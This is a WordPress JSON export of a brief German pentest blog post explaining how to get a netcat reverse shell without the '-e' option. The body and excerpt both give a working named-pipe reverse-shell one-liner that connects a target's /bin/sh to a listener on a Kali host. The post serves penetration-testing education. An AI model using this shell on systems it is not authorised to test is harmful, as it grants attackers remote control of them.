{"id":802,"date":"2013-10-28T20:22:03","date_gmt":"2013-10-28T18:22:03","guid":{"rendered":"http:\/\/blog.patricksauer.net\/?p=802"},"modified":"2013-10-28T20:29:59","modified_gmt":"2013-10-28T18:29:59","slug":"remote-shell-mit-netcat-ohne-e-exec","status":"publish","type":"post","link":"https:\/\/security.sauer.ninja\/de\/pentest\/remote-shell-mit-netcat-ohne-e-exec\/","title":{"rendered":"Remote-Shell mit Netcat ohne &#8222;-e&#8220; exec"},"content":{"rendered":"<p>Manch ein netcat unterst\u00fctzt nicht die Option -e, sodass eine Remote-Shell \u00fcber \u201e-e \/bin\/bash\u201c nicht funktioniert. Die Abhilfe:<\/p>\n<blockquote><p>kali# nc -nvlp 4444<\/p>\n<p>host# mknod \/tmp\/pipe p<\/p>\n<p>host# \/bin\/sh 0&lt;\/tmp\/pipe | nc kali 4444 1&gt;\/tmp\/pipe<\/p><\/blockquote>\n<p>Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Manch ein netcat unterst\u00fctzt nicht die Option -e, sodass eine Remote-Shell \u00fcber \u201e-e \/bin\/bash\u201c nicht funktioniert. Die Abhilfe: kali# nc -nvlp 4444 host# mknod \/tmp\/pipe p host# \/bin\/sh 0&lt;\/tmp\/pipe | nc kali 4444 1&gt;\/tmp\/pipe Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die &#8230; <span class=\"more\"><a class=\"more-link\" href=\"https:\/\/security.sauer.ninja\/de\/pentest\/remote-shell-mit-netcat-ohne-e-exec\/\">[Read more&#8230;]<\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23],"tags":[86,84,85],"class_list":{"0":"entry","1":"post","2":"publish","3":"author-psauer","4":"post-802","6":"format-standard","7":"category-pentest","8":"post_tag-kali","9":"post_tag-nc","10":"post_tag-netcat"},"_links":{"self":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/802","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/comments?post=802"}],"version-history":[{"count":4,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/802\/revisions"}],"predecessor-version":[{"id":806,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/802\/revisions\/806"}],"wp:attachment":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/media?parent=802"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/categories?post=802"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/tags?post=802"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}